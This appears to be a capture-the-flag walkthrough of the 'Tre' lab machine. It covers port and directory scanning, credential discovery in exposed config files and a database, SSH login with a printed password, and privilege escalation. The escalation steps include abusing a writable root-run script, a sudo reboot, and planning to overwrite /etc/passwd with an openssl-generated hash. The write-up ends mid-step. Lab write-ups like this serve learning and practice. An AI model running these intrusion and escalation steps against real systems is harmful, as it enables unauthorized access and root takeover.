🌲Tre

nmap 192.168.224.84 -sVC -A -p- --min-rate 10000

22 (ssh), 80 (http) and 8082 (http) ports were open, so I decided to check the webpage on port 80 and nothing interesting there.

browse the web ports

Option 1 - Gobuster

gobuster dir -u http://192.168.224.84/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt

gobuster dir -u http://192.168.224.84:8082/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -b "400,403,404" -t 50 -e -x "html,php,txt,jsp"

(gobuster dir -k -u https://10.10.10.60/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x txt,cnf,conf)

We tried using big.txt wordlist and we found some more directories let us try to navigate those found directories.

gobuster dir -w /usr/share/wordlists/dirb/big.txt -u http://192.168.153.84/ -t 100 -x .html,.txt,.php > gobuster.txt

Option 2 : dirsearch

dirsearch -u http://192.168.120.84/ -e php,txt,html -w /usr/share/wordlists/dirb/big.txt

Option 3 : dirb

dirb http://192.168.120.84/

Option 4 : ffuf

ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://192.168.120.84/FUZZ -fl 480

Option 4 : wfuzz

wfuzz -c -z file,/usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt --hc 404 http://192.168.120.84/FUZZ

So I visited /adminer.php and found a login page and for which I had no credentials.

Initial Foothold

Next, I ran a gobuster again on /mantisbt and found an interesting directory /config.

gobuster dir -w /usr/share/wordlists/dirb/big.txt -u http://192.168.120.84/mantisbt/ -t 100 -x .html,.txt,.php > gobustermanisbt.txt

wfuzz -c -z file,/usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt --hc 404 http://192.168.120.84/mantisbt/FUZZ

ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://192.168.120.84/mantisbt/FUZZ -fl 480

On navigating to /config directory, verified all files and there was a a.txt file which seemed to be of interest.

On checking the contents of a.txt file, I found credentials for the login page which I had discovered earlier.

Now since I have the credentials, I navigated to /adminer.php and entered the credentials.

I was able to log in successfully.

Next I accessed the mantis_user_table and found interesting credentials which could give me initial access on the target.

With credentials tre:Tr3@123456A! , I successfully logged in via SSH and grabbed my first flag which was in local.txt file.

Privilege Escalation

First of all, I checked for the user privileges using the command sudo -l and found out that the user can run shutdown command as privilege user.

~~Next I ran a~~ ~~linpeas.sh~~ ~~tool and found out something interesting.~~ ~~/usr/bin/check-system~~ ~~file was writeable.~~

Find SUID binaries

find / -perm -4000 -type f -exec ls -la {} 2>/dev/null \;
find / -uid 0 -perm -4000 -type f 2>/dev/null

SUID

SUID/Setuid stands for "set user ID upon execution", it is enabled by default in every Linux distributions. If a file with this bit is run, the uid will be changed by the owner one. If the file owner is root, the uid will be changed to root even if it was executed from user bob. SUID bit is represented by an s.

ls /usr/bin/sudo -alh-rwsr-xr-x 1 root root 138K 23 nov.  16:04 
/usr/bin/sudo

https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/linux-privilege-escalation/#systemd-timers

ps aux - using this command nothing we could identified.

ps aux | grep root

tre@tre:~$ ls -la /usr/bin/check-system

tre@tre:~$ cat /usr/bin/check-system

tre@tre:~$ nano /usr/bin/check-system

tre@tre:~$ sudo shutdown -r now

tre@tre:~$ ls -la /usr/bin/nano

now we can edit the /etc/passwd file and we can add our own password to any user.here we will add password to root user for this we will use the openssl to generate the hash

openssl passwd tre123